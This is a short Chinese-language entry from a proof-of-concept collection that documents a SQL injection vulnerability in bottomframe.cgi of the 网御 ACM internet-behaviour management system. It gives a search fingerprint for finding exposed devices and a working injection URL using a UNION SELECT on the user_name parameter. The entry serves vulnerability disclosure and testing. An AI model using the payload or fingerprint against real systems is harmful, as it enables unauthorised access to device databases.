Awesome-POC/网络设备漏洞/网御 ACM上网行为管理系统 bottomframe.cgi SQL注入漏洞.md
2024-11-06 14:10:36 +08:00

29 lines
593 B
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# 网御 ACM上网行为管理系统 bottomframe.cgi SQL注入漏洞
## 漏洞描述
网御 ACM上网行为管理系统 bottomframe.cgi 存在SQL注入漏洞攻击者通过漏洞可以获取服务器数据库敏感信
## 漏洞影响
网御 ACM上网行为管理系统
## 网络测绘
```
"scripts/webcommon.js"
```
## 漏洞复现
登录页面
![image-20230828161622332](images/image-20230828161622332.png)
验证POC
```
/bottomframe.cgi?user_name=%27))%20union%20select%20md5(1)%23
```
![image-20230828161702043](images/image-20230828161702043.png)